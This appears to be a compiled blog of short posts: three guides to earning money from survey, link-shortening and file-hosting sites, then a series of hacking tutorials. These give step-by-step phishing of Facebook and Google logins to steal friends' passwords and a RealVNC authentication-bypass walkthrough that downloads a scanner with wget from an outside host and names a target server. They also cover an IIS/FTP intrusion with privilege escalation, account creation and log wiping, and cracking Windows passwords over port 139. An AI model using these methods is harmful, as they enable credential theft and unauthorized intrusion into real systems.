making money from A.W. Surveys

Untuk Bahasa Indonesia klik dsini

Post today I will discuss about how to make money from the internet with AW Surveys.

What is A.W. Surveys ?

A.W. Survey is a website that can give you paid just by doing a survey of websites or certain products. In addition you will get paid if there is someone  sign up through your refferal link.

How to Register on A.W. Surveys

1. Please click here to go to the A .W. Surveys registration page

2. then select, Create A Free Account.

 

3. Next you will be faced with a new Form Account.

4.  Fill in the appropriate Form of your identity.

5 . If all have been filled, please enter the verification code and click the Create Free Account button

6. After that you'll get a notification that your account has been created

7. These pages are your table balance written in $ 0, because you have not done a survey.

8. Then,  please do a survey that has been provided .First survey you will get $6 , second suvey you will get $4, and so on until the money you get from these surveys is $ 27.

9. After you do all the surveys, please see your table balance

Congratulation ! ,

Now,  your  balance table have been increased.


Get money from referral link

- Click refer friends.

 

 - There you will see your referral link.

 

Share your referral link to your friends, or you can put your referral link on your website, blog, or your facebook. and if there are people who sign up on your referral link, you'll get paid $ 1.25.

Thanks for visit my blog :D

How to get money from adf.ly

Untuk Bahasa Indonesia Klik Dsini

One more online money-maker program, for those of you who like to make money on the internet. Currently there is a proven web has to pay.

The name of the website is adf.ly, is the site to shorten links and also to hide the original link, as well as tinyurl and usercash. But the advantages of Adf.ly is that we will get money from every link that we promote on clicks by visitors to your website / blog.

More detail might look like this:

1. If you register , you will immediately get a bonus $ 5
2. Any links that visitors click on oursite , will get $ 0001
3. You will be paid , if the your payment has been $ 20 by paypal and will be processed after 48 hours - 72 hours

The workings of Adf.ly

Adf.ly is an innovative service that allows you to earn money from every visitor. 

The workings of adf.ly quite simple:

1. shorten your link site with adf.ly.
2. Links will be shorten, for example a download link a product, peculiar image links, information  links and more information
3. You can post your links or send to your friends, can also be posted on the web, blogs or in forums or your facebook.

How many payments you get ?

It all depends on the number of people who clicked on your link.
the more people who click your link, the more payment you will get


How you will be paid?


Currently adf.ly only use paypal to provide payment to you. If you do not have a paypal account. Please register here.


How to register at adf.ly

register in adf.ly is easy and free. Well now we will register in adf.ly.


1. Click here to go to the registration page

2. then click the join now button 

3. Then fill in the registration form and Submit.

4. Now, you're ready to earn some money by shrinking your URLs and share it to the world.

 

How to make money with ziddu

 

Untuk Bahasa Indonesia Klik Disini

Ziddu is a completely free file hosting which offer many great services and allow their members to earn and make money from their uploads. They gives user flexibility to create audio and video to share with other peoples. Unlike other free hosting Ziddu accepts parallel download so you don't have to wait for the countdown time to end anymore.

1. unlimited upload files.
2. file size limit is 200 MB per file.
3. file is keep 90 day after the last download.
4. No countdown time and allow multiple downloads.
5. Ziddu offers free accounts for all members. No premium accounts.
6. If your files are photos, video clips or songs. They will show preview of your files and if someone click to enlarge your photos, play your video files or listen to your songs. You will get 1 download count.
7. Minimum payout is $10 per 10000 downloads.
8. Ziddu have email option that enable user to send download links to their friends.
9. have IP per file per day restriction so one person per download per day will get the download count.

Payment

Ziddu pay you by PayPal or Money Bookers. You will have to wait for 40 days before your receives your payment. you'll be able to withdraw you revenue after your earning reaches $10.

How to make money with ziddu - step by step registration guide

1) Go to Ziddu website Here.

2) You will see the form below. Fill in your name, email, password, verify code, tick on I agree terms and conditions then click the submit button.

3) After registeration you can login to your account at login page.

4) After you login go to payment settings as shown below.
 

5) At payment details choose PayPal or Money Bookers.

6) To upload files go to MyFiles.

7) You can either upload a single file or multiple files.

8) After you have completely uploaded your files to their server you will get link which look like the one below.

9) Now all you have to do is promote this link to where peoples are heavily spotted and watch money pouring in to you account !.

Here is payment proof earning from ziddu which is usually payout after 40 days of the previous earning.

Upload files and get paid now !

thank's to http://www.getpaidtowebsites.com/

Hack Facebook Account With Fake Login

Untuk bahasa Indonesia Klik Disini

Hacking Facebook with a phishing method is one of the most preferred method used for hacking facebook password. And ways to use it is also very easy.

1. Download file  here (wait for 5 sceonds, and clikc "SKIP AD").

2. The file you downloaded earlier include

* index.html
* write.php
* passes.txt

3. Upload the two files that you downloaded earlier to free webhosting like http://www.yourfreehosting.net/ http://www.t35.com or webhosting or whatever you like.

4. Now, send the link upload phiser that you created earlier (link index.html) to your victim and make log into his Facebook account using the phishers that you send.

5. After the victim logged into his Facebook account using the phishers, automatically all the username and password login id which has been the victim use will be stored in the file "passes.txt". This file is created in the web host's control panel as shown below.

6. (Last), open the "passes.txt" to get hacked id username and password as shown in the picture below.

 Done ...
You've got a username and password the victim.

thank's to http://didid-cracker.blogspot.com

Learn phishing using Google Pages

Untuk Bahasa Indonesia Klik Disini

Here is a small tutorial on how you can trick your friends and get their gmail or Google username and password.

The entire technique demonstrated here is technically called as phishing. In computing, phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card information. It is infact a crime to trick and get personal sensitive information using phishing.

I am using Google Pages to demonstrate how phishing works. The bad news is that Google Pages does not accept new signup as of now. If you already have an account over there then you can just consider yourself lucky.

Since we are using Google pages, it is obvious and common sense to use something relevant to Google so that users believe that they are actually being asked some information by Google. We will create a login page exactly you see at pages.google.com to capture user password. Since the user is on Google Pages, and he see’s a Google Pages login page, he will trust it. This is all required to make the user actually believe that he or she is on a web page that is not new to her. This is an important aspect while implementing phishing

Before we begin, I must tell you that you must know a web programming language, plus you must have web space where you can host your code. I used asp.net to create a login page that looks exactly like the one at pages.google.com, except for the text written in the yellow strip.

Let us begin now

Step 1: Go to pages.google.com and login using your Google account.

Step 2: We are going to create two web pages. The page we are creating now will host your personal information and photographs from some trip or anything that you think will interest your friends. This is the page your friends will see after they login through the fake page that you create later in step 3. So, click on Create a new page link to create a page. Lets assume that you create a web page with name “My NASA visit” as I have some pics of my NASA visit. Upload your photographs on it so that your friends believe that you actually went on a visit. Publish this page and save the link. In my case, the link is http://xxxxxxx.googlepages.com/mynasavisit

Step 3: Create another web page. Give this page title “NASA visit” or a name which looks something close to what we created in step 2. This is because the user will be redirected to the page created in step 2 after he logs in from this page we are creating now and he/she shouldn’t feel the change. Once you are on the Page Creator page, click “Change Look” to change the look of the web page.

Step 4: On the “Choose Look” page, select the Micro Ghost template.

Step 5: Now change the text color of the text “Google Pages” to white color so that it becomes invisible. Select the text and use the text color option in the toolbar to set white color.

Step 6: Now you need your web programming skills to create a login page that looks like the one at pages.google.com. You may change the text in the yellow strip to something like “Please authenticate yourself to view the Published Page”. While you design the page, you will have to take care of using labels or panels or images with white background which will cover the highlighted gray area. Host this page on a different server

On the Google page that we created in step 3, click on the “Click here to enter your page’s main content” and enter a iframe code to give a reference to your web page that you created which looks like the login page.

For example,

"<iframe id=”GooglePages” src=”http://www.yourwebpage.com/page.aspx” frameborder=”0″ style=”left: 0px; top: 0px; height:858px; width:100%; z-index: 106;” marginheight=”0″ marginwidth=”4″ title=”Google Pages” allowtransparency=”" >

</iframe>"

Now publish your page and it should something like this.

This is a snapshot of the page that I have created. Note that I have blurred out my name from the page. Notice the text in yellow is different from what you see at pages.google.com

Important Read it:

It takes some time to create the page UI but is worth tricking your friends. Make sure you redirect the user after he clicks Sign In button to the web page created in Step 2. The user will feel that he has passed authentication. You can capture the username and password and mail it to your email account. Also, use basic validation on username and password like minimum length, etc to give it a real look. Again, use a cookie to check if the user is entering username and his password for the first time. If yes, send a Google style message saying invalid credentials and ask the user to re-enter the credentials. Also, he links that you see on the page are all working and pointed to actual Google pages. This is all to give a real look and to trick those who are suspicious about the page

So, we have something to learn from here

• You learnt what is phishing with an example using Google Pages
• Important learning is that you should not click on any link that your friend might send you. Most of the times, it is the closer dearer ones who trick you to get your username and passwords
• Don’t provide your username, password on websites you visit for the first time and you don’t know what they exactly offer.
• To be on safe side, create a dummy of fake email account on gmail, yahoo with passwords that you don’t use anywhere else. So, in worst case you will loose a email account but your other personal accounts will be safe

VNC Viewer Authentication Bypass Hacking

This Basic tutorial will teach you how to hack real VNC server databases.


some servers have mysql database and important information like Credit Card INFORMATION.

so it will depend on what ip range or what server are you scanning and what kind of server is running.

you can hack linux servers, sunos servers, mac os servers,xp servers etc. as long as they are vulnerable to

VNC AUthentication Bypass and using REAL VNC so this software will only bypass the real vnc software its like

Remote desktop in there servers.

The things you need here is:

1. RealVNC <= 4.1.1 Bypass Authentication Scanner

2. VNC Viewer Authentication Bypass


3. Linux uid shell or rootshell

=========Linkz==========

any of these tools will not held me resposible for any damages or action to the servers that

you have hack its your own free will.if you want to download it or not its your choice. or you

can try to find or search tools like this in the net.i just got this tools from some servers too.

im just sharing informations

(RealVNC <= 4.1.1 Bypass Authentication Scanner) for linux shell only

http://upsstoreflorida.com/images/VNCscan

(VNC Viewer Authentication Bypass link) windows base software

http://upsstoreflorida.com/images/vncviewer-authbypass.zip

(Linux uid shell or rootshell)

Go Find your own shell to use

so after you have gathered the tools you needed LETS START!first login to you shell

then try to scan for vulnerable vnc servers by using the (RealVNC <= 4.1.1 Bypass Authentication Scanner).

after scanning the output of your scan will go to VNC_bypauth.txt. all you need to do is cat VNC_bypauth.txt.

then it will show the vnc servers you have scan if vulnerable or patch or banned so just get the VULNERABLE IPS


then use the ip put it in the (VNC Viewer Authentication Bypass link) server box and just click OK.it will try to

bypass auth the real vnc server if successfull you will be able to get in there desktop or server.

this will be the process command output on the shell.

===SHELL EXAMPLE==

-sh-3.2$ wget http://upsstoreflorida.com/images/VNCscan

–09:47:54– http://upsstoreflorida.com/images/VNCscan

=> `VNCscan’


æ­£å¨æ¥æ¾ä¸»æ© upsstoreflorida.com… 216.251.43.17

æ­£å¨é£æ¥ upsstoreflorida.com|216.251.43.17|:80… é£ä¸äºã

å·²éåº HTTP è¦æ±ï¼æ­£å¨ç­ååæ… 200 OK

é·åº¦: 42,895 (42K) [text/html]

100%[====================================>] 42,895 34.24K/s

09:47:58 (34.16 KB/s) — å·²å

²å­ âVNCscanâ [42895/42895])

-sh-3.2$ ls -al

ç¸½è¨ 124

drwxr-xr-x 2 sally users 4096 2009-07-08 09:47 .

drwxr-xr-x 6 sally users 4096 2009-06-13 22:41 ..

-rwxr-xr-x 1 sally users 42895 2009-04-25 19:37 v

-rw-r–r– 1 sally users 27730 2009-07-08 10:24 VNC_bypauth.txt


-rwxr-xr-x 1 sally users 42895 2009-05-07 16:05 VNCscan

-sh-3.2$ ./VNCscan 符æ¬éç ä½

-sh-3.2$ chmod +x VNCscan æ

-sh-3.2$ ./VNCscan

================================================[rev-0.0.1]==

========RealVNC <= 4.1.1 Bypass Authentication Scanner=======

============multi-threaded for Linux and Windows=============

====================================================[linux]==


MAIN MENU

=============================================================

[+] Usage: VNC_bypauth <target> <scantype> <option>

[-] <target>:

___________________


|___-p____|___-i____|

[-] <scantype>:

____________________

|___-cT___|___-vnc___|

[-] <option>:

________________________________________________________

|___-v____|___-vv____|___-T___|__-tc___|__-tr___|__-tt___|

[+] Type VNC_bypauth <target>,<scantype> or <option> for more informations

[+] To increase the speed under linux, try ulimit -s unlimited

-sh-3.2$ ./VNCscan -p 5900 -i 63.89.1.1-63.250.1.255 -vnc -vv

================================================[rev-0.0.1]==

========RealVNC <= 4.1.1 Bypass Authentication Scanner=======


============multi-threaded for Linux and Windows=============

====================================================[linux]==

FOUND PORT IP STATUS THREADS TOTAL/REMAINING

63.89.76.144 :5900 vnc4:VULNERABLE

63.89.62.88 :5900 vnc4:banned

63.89.109.240 :5900 vnc4:patched

63.89.139.200 :5900 vnc4:patched

63.89.139.201 :5900 vnc4:patched

63.89.139.210 :5900 vnc4:patched


63.89.139.240 :5900 vnc4:patched

63.89.139.239 :5900 vnc4:patched

63.89.139.250 :5900 vnc4:patched

63.89.139.202 :5900 vnc4:patched

63.89.157.9 :5900 vnc4:banned

F:0 P:53584 I:53584 S:8 % TH:86 0:00:21/0:03:51

here is the pictures of the

RealVNC <= 4.1.1 Bypass Authentication Scanner

[img src="http://upsstoreflorida.com/images/vncscanner.JPG"]

VNC Viewer Authentication Bypass

[img src="http://upsstoreflorida.com/images/vncauthbypass.JPG"]

HACK SERVER Sample from VNC Viewer Authentication Bypass

[img src="http://upsstoreflorida.com/images/vncserver.JPG"]

TRY THIS VULNERABLE SERVER BY USING THE VNC Viewer Authentication Bypass SERVER : 63.230.75.203

Here you go enjoy.

Hacking Windows NT with IIS & FTP

 Untuk Bahasa Indonesia klik Disini

This is another selection from the ask, I like these as they tend to generate some good discussion and they are a good introduction to newcomers to hacking on the mindset and workflow of getting access to a box. The exact methods may not work, but we aren’t here to train script kiddies, we just want to make you think.

Johnny Hacker has a Windows NT Server at home. Why? Because he knows if he’s going to hack NT he’s best using the same type of computer…it gives him all the necessary tools. He has installed RAS and has a dial-up connection to the Internet. One morning, around 2:00am he dials into the Internet…his IP address is dynamically assigned to him. He opens up a Command Prompt window and gets down to work. He knows www.company.com’s web server is running IIS. How? Because he once did a search on “batch fil es as CGI” using Excites search engine. That phrase is in Chapter 8 of Internet Information Server’s on-line help….and unfortunately it’s been indexed by Excite’s spider…now Johnny has a list of around 600 web servers running IIS.

He ftps to www.company.com. He isn’t even sure yet if the server is running the ftp service. He knows if he gets a connection refused message it wont be…he’s in luck though…the following appears on the screen:

"C:\ftp www.company.com
Connected to www.company.com.

220 saturn Microsoft FTP Service (Version 3.0).

User (www.comapny.com:(none)):"

This connection message tells him something extremely important:The
NetBIOS name of the server : SATURN. From this he can deduce the name
of the anonymous internet account that is used by NT to allow people to
anonymously u se the WWW, FTP and Gopher services on the machine. If
the default account hasn’t been changed, and he knows that it is very
rare if it has been changed, the anonymous internet account will be
called IUSR_SATURN. This information will be needed later if he’s to
gain Administrator access to the machine. He enters “anonymous”as the
user and the following appears: 

"331 Anonymous access allowed, send identity (e-mail name)as password.
Password:"

Johnny often tries the “guest” account before using “anonymous” as the user. A fresh install of NT has the “guest” account disabled but some admins enable this account...and the funny thing is they usually put a weak password on it such as ‘guest’ or no password at all. If he manages to gain access to the ftp service with this account he has a valid NT user account….everything that the “guest” account has access to…so does Johnny, and sometimes that can be almost everything. He knows he can access their site now…but there is still a long way to go yet….even at this point he still might not get access. At this point he doesn’t even supply a password…he just presses enter and gets a message stating that the Anonymous user is logged in.

First off he types “cd /c” because some admins will make the the root of the drive a virtual ftp directory and leave the default alias name : “/c”. Next he sees whether he can actually “put” any files onto the site ie. is the write permission enabled for this f tp site. He’s in luck. Next he types “dir” to see what he has access to. He chuckles to himself when he sees a directory called “CGI-BIN”. Obviously the Webmaster of the NT machine has put this here with the rest of the WWW site so he can remotely make changes to it. Johnny knows that the CGI-BIN has the “Execute” permission so if he can manage to put any program in here he can run it from his web browser. He hopes that the Webmaster hasn’t, using NTFS file-level security, cut off write access to the anonymous internet account to this directory…even though he knows there are sometimes ways round this. He changes to the CGI-BIN directory and then changes the type to I by using the command “binary”. Then he types “put cmd.exe”. He’s in luck..he gets the following response :

"200 PORT command successful.

150 Opening BINARY mode data connection for CMD.EXE.
226 Transfer complete.
208144 bytes sent in 0.06 seconds(3469.07 Kbytes/sec)"

Next he puts getadmin.exe and gasys.dll into the same directory. With these three files in place he doesn’t even gracefully “close” the ftp session; he just closes the Command Prompt window. With a smile on his face he leans back and lights a smoke, savouring the moment…he knows he has them…. After crunching the cigarette out in an overflowing ashtray he connects to AOL. He does this because if logging is enabled on the NT machine the IP address of AOL’s proxy server will be left and not his own…not that it really matters because soon he’ll edit the logfile and wipe all traces of his presence. Opening up the web browser he enters the following URL:

http://www.company.com/cgi-bin/getadmin.exe?IUSR_SATURN

After about a fifteen second wait the following appears on his web browser:

"CGI Error
The specified CGI application misbehaved by not returning a 

complete set of
HTTP headers."

The headers it did return are:

"Congratulations , now account IUSR_SATURN have administrator rights!"

He has just made the anonymous internet account a local administrator and consequently using this account he can do pretty much what he wants to. Firstly though, he has to create an account for himself that he can use to connect to the NT server using NT Explorer and most of the Administrative tools. He can’t use the IUSR_SATURN account because he doesn’t know the randomly generated password. To create an account he enters the following URL:
cmd.exe?/c%20c:\winnt\system32\net.exe%20user%20cnn%20news%20/add
He has just created an account called “cnn” with the password “news”. To make the account a local administrator he enters the following URL:

http://www.company.com/cgi-bin/getadmin.exe?cnn

It has taken him less than ten minutes to do all of this. He disconnects from AOL and clicks on start, goes upto find and does a search for the computer www.company.com. After about a minute the computer is found, next he right clicks on the “computer” and then clicks on Explore. NT Explorer opens and after a little wait Johnny is prompted for a user-name and password. He enters “cnn” and “news”. Moments later he is connected. Admin rights for the computer www.company.com are appended to his own security access token…now he can do anything. Using User Manager for Domains he can retrieve all the account information; he can connect to the Internet Service Manager; he can view Server Manager…first though, using NT Explorer he maps a drive to the hidden system share C$. He changes to the Winnt\system32\logfiles directory and opens up the logfile for that day. He deletes all of the log entries pertaining to his “visit” and saves it. If he gets any message about sharing violations all he has to do is change the date on the computer with the following URL:

http://www.company.com/cgi-bin/cmd.exe?/c%20date%2002/02/98

Next, using the Registry Editor he connects to the registry on the remote computer. Then using L0phtcrack he dumps the SAM (the Security Accounts Manager – holds account info) on the NT server and begins cracking all the passwords on the machine. Using the Task Manager he sets the priority to Low because L0phtcrack is fairly processor intensive (NB L0phtcrack ver 2.0 sets the priority to Low anyway) and there is still a few thing he must do to hide the fact that that some-one has gained entry. He deletes cmd.exe, getadmin.exe and gasys.dll from the cgi-bin, then he checks the security event log for the remote NT server using Event Viewer to see if he’s left any traces there.

Finally using User Manager for Domains he removes admin rights from the IUSR_SATURN account and deletes the cnn account he created a few moments earlier. He doesn’t need this account anymore….L0phtcrack will be able to brute force all the accounts. Next time he connects to this machine it will be using the Administrator account. He breaks his connection to the Internet and sets L0phtcrack’s priority to High, leaves it running and heads to bed…Looking at his alarm clock : it’s just passed 2:30am….Sighing to himself, he mumbles, “Sheesh, I’m getting slow!” and falls asleep with a grin on his face.

thank's to : http://www.binushacker.net/

Hacking Local Area Network

 Untuk Bahasa Indonesia Klik Disini

Hack Local Area Network – LAN Hack – LAN Hacking.

This technique will be taking advantage of Port 139.

Most of the time,Port 139 will be opened.

First of all,I will do a port scanning at the target computer which is 192.168.40.128.

This computer is inside my LAN network.

I will scan it using Nmap.

I get the result and it shows Port 139 is opened up for me.

Now you will need both of these tools:
** USER2SID & SID2USER, Click here to Download (wait 5 seconds and click the "SKIP AD")
** NetBios Auditing Tool, Click here to Download (wait 5 seconds and click the "SKIP AD")

You can get both of them on the Internet.

After you get both of them,put them in the C:\ directory.

You now need to create a null session to the target computer.

Now open the Command Prompt and browse to the USER2SID & SID2USER folder.There will be 2 tools inside it,one will be USER2SID and another one will be SID2USER.

We will first using USER2SID to get the ID.

We will test against the Guest account because Guest account is a built in account.

After we get the ID,we need to do some modification on the ID.

We take the ID we get from the guest account and modified it become
“5 21 861567501 1383384898 839522115 500″.

Please leave out the S-1-,leave out all the – too.

Now you will see that you get the username of the Administrator account.

In this case,the Administrator account is Administrator.

Create a text file called user.txt and the content will be the username of the Admin account.



Prepare yourself a good wordlist.



Now put both of them in the same directory with the NetBios Auditing Tool.


Now we are going to crack the Admin account for the password in order to access to the target computer.
Browse to the NetBios Auditing Tool directory.



Press on enter and the tool will run through the passlist.

In this case,I have get the password.

In order to proof that I can get access to the target computer using this password.



After you press enter,it will prompt you for the username and password.



Therefore,just input them inside the prompt and continue.



Target C drive will be on your screen.

In order to prevent from this attack,close down port that you do not want to use such as Port 135,Port 136,Port 137,Port 138 and Port 139.

thank's to http://www.binushacker.net/